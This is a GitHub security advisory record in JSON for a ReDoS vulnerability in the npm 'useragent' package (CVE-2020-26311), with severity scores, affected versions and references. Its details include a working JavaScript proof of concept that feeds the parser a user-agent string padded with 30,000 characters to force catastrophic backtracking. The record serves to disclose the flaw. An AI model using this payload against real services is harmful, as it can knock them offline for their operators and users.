{"id":"GHSA-mgfv-m47x-4wqp","summary":"useragent Regular Expression Denial of Service vulnerability","details":"Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).\n\n## PoC\n```js\nasync function exploit() {\n   const useragent = require(\\\"useragent\\\");\n\n   // Create a malicious user-agent that leads to excessive backtracking\n   const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';\n\n   // Parse the malicious user-agent\n   const agent = useragent.parse(maliciousUserAgent);\n\n   // Call the toString method to trigger the vulnerability\n   const result = await agent.device.toString();\n   console.log(result);\n}\n\nawait exploit();\n```","aliases":["CVE-2020-26311"],"modified":"2025-09-03T15:17:53Z","published":"2024-10-26T21:30:47Z","database_specific":{"github_reviewed":true,"cwe_ids":["CWE-1333"],"github_reviewed_at":"2024-10-28T15:01:50Z","nvd_published_at":"2024-10-26T21:15:14Z","severity":"MODERATE"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26311"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/issues/167"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/commit/4c3ee79358bea72d88fe78ac98f4f861db40b89b"},{"type":"PACKAGE","url":"https://github.com/3rd-Eden/useragent"},{"type":"WEB","url":"https://github.com/3rd-Eden/useragent/blob/ffa906f923183c85fbb9e6c90f19345e2bd3c52a/lib/regexps.js#L5568"},{"type":"ADVISORY","url":"https://securitylab.github.com/advisories/GHSL-2020-312-redos-useragent"}],"affected":[{"package":{"name":"useragent","ecosystem":"npm","purl":"pkg:npm/useragent"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"2.3.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-mgfv-m47x-4wqp/GHSA-mgfv-m47x-4wqp.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/U:Green"}]}